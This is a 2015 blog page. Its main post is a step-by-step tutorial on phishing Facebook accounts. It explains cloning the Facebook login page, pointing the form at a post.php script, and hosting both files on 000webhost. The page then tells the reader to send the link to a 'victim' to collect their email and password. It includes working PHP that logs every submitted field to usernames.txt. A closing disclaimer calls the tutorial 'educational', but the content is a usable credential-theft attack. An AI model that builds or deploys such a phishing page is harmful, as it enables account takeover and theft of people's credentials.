03 Jul 2015 0 comments

Google Fiber India   Google is keen to launch its optical fiber-based broadband services in India as part of the Digital India programme. The internet giant plans to roll out a fibe...

Read More
19 Jun 2015 1 comments

WATSFAPP REVOLUTIONARY WATSAPP    Download here & enjoy  use 2-5 watsapp in one phone , customized interface etc.  ...

Read More
15 Jun 2015 5 comments

How to Download android files in .APK format to PC How to Download APK Files From Google Play Store to PC Here are 2 Methods to download APK files.. I hope u like it | Met...

Read More
14 Jun 2015 0 comments

#OpStopReliance      More like transformation of Reliance India Limited to Reliance China Limited #OpStopReliance  It's illegal to reverse engineer & companies like ...

Read More
14 Jun 2015 0 comments

"How To Easily Root An Android Phone"  Rooting is the Android equivalent of jailbreaking, a means of unlocking the operating system so you can install unapproved (by Google) apps, update th...

Read More
09 Jun 2015 0 comments

"Airtel Is Spying On You. Indian Coder Who Exposed This Gets Legal Notice From Israel" Imagine an Israeli company spying & collecting your personal and browsing information without your kno...

Read More
08 Jun 2015 0 comments

Lenovo T450s 14-inch laptop for $702 For a limited time, Lenovo is offering the 14-inch T450s laptop at a greatly reduced price. With a new Broadwell processor, an HD web cam, and incredible...

Read More
08 Jun 2015 0 comments

Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .N...

Read More
Powered By Blogger

Latest Posts:

How to hack Facebook Account - Easy Method



Hey guys its me #RAH here, today i m gonna show u how to make a phishing page & pwn a Facebook account by phishing.

  Steps to create a phishing page:

1.
Go to the Facebook page ,and then right click
on the page, u will see the option view source page ,click on that.

2.now a new tab will open which contain a source
code,Select all the stuff and paste it in a notepad.

3.Now open the notepad and press CTRL+F ,and

type ACTION.

4.You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1 "

5.Delete all the text written in red colour and
instead of it write post.php.then it will look like...
action= "post.php "

6.Now save it on your desktop with the
name index.htm ,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .

8.Open a new notepad and save the given data with the name post.php .


<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

9.You have two files now one is index.htm and another is post.php ,remember file extension is important.

10.Now u have to upload it in a web hosting site , I prefer u to use 000webhost 

11.I prefer u to use 000webhost because it will be easy to use.


12.You have to make a account in that,after that
it looks like a picture given below.

13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go
to public_html.

15.Delete the file named default.php ,after that upload two files index.htm and post.php one by one .

16.Now the last step click on view of index.htm it will look same as facebook page.


17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page
redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html, here you find a new file named username.txt.

19.Click on view now u will have your
friend's password and email id.

20.This is a simple trick to hack
any Facebook password account by phishing page.



Note:
phishing is a illegal activity so don't try on
anyone.this tutorial is for educational purpose. We Are not responsible for any kind of problem do it at your own
Risk 
 
Share on Google Plus

About Rahul B (T3CH-G33K)

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment